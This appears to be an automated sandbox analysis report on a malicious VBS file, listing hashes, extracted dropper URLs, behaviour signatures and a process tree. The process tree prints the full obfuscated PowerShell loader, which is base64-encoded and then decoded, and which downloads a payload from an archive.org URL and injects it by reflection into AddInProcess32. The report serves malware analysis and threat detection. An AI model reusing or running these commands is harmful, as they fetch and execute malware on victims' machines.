Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    17-09-2024 14:05

General

  • Target

    Label_PL001292992.vbs

  • Size

    509KB

  • MD5

    2ed45f6abaeb502d6ff4d23237566c94

  • SHA1

    d284892891b5f51bc38225e9e5facbbaaff5e714

  • SHA256

    cfe9d1eca804cfb9d54224474dd7e71a2ee2b19d3b721728bd9e8ec326c5594f

  • SHA512

    4e2ef24f5bd791fb9e457c17f7224358bf2c34d4831b1af4929d3f144284ac52c1828b6c4df2342738e878ba80e80a16ec18592fab258ddd8e6c1fd143f0bfaa

  • SSDEEP

    12288:ZFQtuemF7ZN1OFvOuozQnL8ZoaoBIonqqzUSOEUDYTXnnvxwKt+MmBsHHG6LiF/O:CNNwqunWp

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Label_PL001292992.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTVFJJbmddJFZFUkJPU0VQckVGZXJlbmNFKVsxLDNdKydYJy1qT2lOJycpICgoJ3UnKydobHVybCA9ICcrJ1QnKydObGh0JysndHBzOi8nKycvJysnaWE2MCcrJzAxMDAuJysndXMuJysnYScrJ3JjaGl2ZS5vcmcnKycvMjQvaScrJ3RlbXMvZGUnKyd0YWgtbicrJ290JysnZScrJy12JysnL0RldGFoJysnTicrJ290ZVYudHh0VE5sOycrJ3VobGInKydhc2U2NENvbnRlJysnbicrJ3QnKycgPSAoTmUnKyd3LU9iamVjdCBTJysneXN0ZW0uTmV0LldlYkNsJysnaWVuJysndCkuRG8nKyd3bmxvJysnYScrJ2RTJysndHJpbmcodWhsdXJsKTt1aGxiJysnaW5hcnlDb250ZW50ID0gJysnW1N5c3RlJysnbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluJysnZygnKyd1aGxiYXMnKydlNjRDb250ZW4nKyd0KTt1aGxhc3NlJysnbWJseSA9IFtSZWZsZWN0aW9uJysnLkFzc2VtYicrJ2wnKyd5XTo6TG9hZCh1aGwnKydiaW5hcicrJ3lDb250JysnZScrJ250KTt1JysnaGx0JysneXAnKydlID0gdWhsYXNzZW0nKydibHkuRycrJ2V0VCcrJ3lwZSgnKydUTmxSdScrJ25QRScrJy5Ib21lJysnVE5sKTt1JysnaGxtZXRob2QgPSB1aGwnKyd0eXBlJysnLkcnKydldE1ldGhvJysnZCcrJyhUJysnTmwnKydWQUlUTicrJ2wpO3VobG1lJysndGhvZC5JJysnbnZva2UoJysndWhsbnVsbCwgW29iaicrJ2VjJysndFtdXUAoVE5sMCcrJy9CeHlvJysnQi9kL2VlLicrJ2V0cycrJ2FwLy86c3B0dGgnKydUTmwgLCBUTmxkZXNhdGl2YWRvVE5sICwnKycgVE5sZGVzYXRpdicrJ2Fkb1RObCAsJysnICcrJ1RObGQnKydlc2F0aXZhZG8nKydUTmwsJysnVE5sQWRkSW5Qcm9jZScrJ3NzMzInKydUTmwsVE5sVE5sKSknKS5yZXBMYWNFKChbY2hBcl04NCtbY2hBcl03OCtbY2hBcl0xMDgpLFtzdHJJTmddW2NoQXJdMzkpLnJlcExhY0UoJ3VobCcsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([STRIng]$VERBOSEPrEFerencE)[1,3]+'X'-jOiN'') (('u'+'hlurl = '+'T'+'Nlht'+'tps:/'+'/'+'ia60'+'0100.'+'us.'+'a'+'rchive.org'+'/24/i'+'tems/de'+'tah-n'+'ot'+'e'+'-v'+'/Detah'+'N'+'oteV.txtTNl;'+'uhlb'+'ase64Conte'+'n'+'t'+' = (Ne'+'w-Object S'+'ystem.Net.WebCl'+'ien'+'t).Do'+'wnlo'+'a'+'dS'+'tring(uhlurl);uhlb'+'inaryContent = '+'[Syste'+'m.Convert]::FromBase64Strin'+'g('+'uhlbas'+'e64Conten'+'t);uhlasse'+'mbly = [Reflection'+'.Assemb'+'l'+'y]::Load(uhl'+'binar'+'yCont'+'e'+'nt);u'+'hlt'+'yp'+'e = uhlassem'+'bly.G'+'etT'+'ype('+'TNlRu'+'nPE'+'.Home'+'TNl);u'+'hlmethod = uhl'+'type'+'.G'+'etMetho'+'d'+'(T'+'Nl'+'VAITN'+'l);uhlme'+'thod.I'+'nvoke('+'uhlnull, [obj'+'ec'+'t[]]@(TNl0'+'/Bxyo'+'B/d/ee.'+'ets'+'ap//:sptth'+'TNl , TNldesativadoTNl ,'+' TNldesativ'+'adoTNl ,'+' '+'TNld'+'esativado'+'TNl,'+'TNlAddInProce'+'ss32'+'TNl,TNlTNl))').repLacE(([chAr]84+[chAr]78+[chAr]108),[strINg][chAr]39).repLacE('uhl','$'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WWZWGAU9DRAHWK1NOJNI.temp

    Filesize

    7KB

    MD5

    a057eafe686cc7a2bf70bdb1d4fa554b

    SHA1

    cd7203cfdcb2499ee5a972ebd48a42de647cd640

    SHA256

    694eb3b133bfc1abe962c3f069340c26fd6566e751f66363dc9ab7daad9db75f

    SHA512

    194084937131cdd7f7f209405a4df71145e2d6b48b34738d7a32dbaca6fc08facd34bc78202ffcbd3ab82c8b2130d529fa7743754e5b168a6206f2451005cadf

  • memory/2696-4-0x000007FEF5F0E000-0x000007FEF5F0F000-memory.dmp

    Filesize

    4KB

  • memory/2696-5-0x000000001B730000-0x000000001BA12000-memory.dmp

    Filesize

    2.9MB

  • memory/2696-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

  • memory/2696-7-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-8-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-9-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-10-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-11-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2696-17-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

    Filesize

    9.6MB